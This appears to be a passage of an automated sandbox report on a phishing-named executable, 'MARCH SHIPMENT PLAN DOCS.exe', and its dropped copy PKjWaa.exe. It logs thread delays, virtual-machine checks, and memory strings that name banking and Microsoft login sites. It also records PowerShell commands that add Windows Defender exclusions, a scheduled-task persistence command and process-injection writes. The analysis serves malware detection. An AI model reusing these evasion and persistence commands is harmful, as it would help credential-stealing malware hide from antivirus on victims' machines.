              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597781Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597451Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597344Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597125Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597016Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596766Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596543Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596436Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595766Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595641Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594766Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594641Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594516Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599891
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599779
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599666
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599547
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599435
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599328
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599219
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599109
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599000
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598891
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598781
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598671
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598562
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598453
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598342
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598234
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598125
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598015
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597905
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597797
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597687
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597578
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597469
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597359
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597250
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597141
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597030
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596922
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596812
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596703
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596594
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596469
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596359
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596250
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596140
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596031
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595922
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595804
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595687
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595578
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595469
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595344
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595234
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595125
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595015
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 594906
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 594797
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 594687
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 594578
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: PKjWaa.exe, 0000000C.00000002.1319303263.0000000000EA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: PKjWaa.exe, 0000000C.00000002.1319303263.0000000000E61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: PKjWaa.exe, 00000014.00000002.3704246417.000000000105F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMode
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3703868306.0000000001446000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: PKjWaa.exe, 0000000C.00000002.1319303263.0000000000E61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5cd0d6d8d833<
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd5c610e80a695<
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: PKjWaa.exe, 00000014.00000002.3710009312.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F29448 LdrInitializeThunk,10_2_06F29448
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeMemory written: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory written: C:\Users\user\AppData\Roaming\PKjWaa.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess created: C:\Users\user\AppData\Roaming\PKjWaa.exe "C:\Users\user\AppData\Roaming\PKjWaa.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
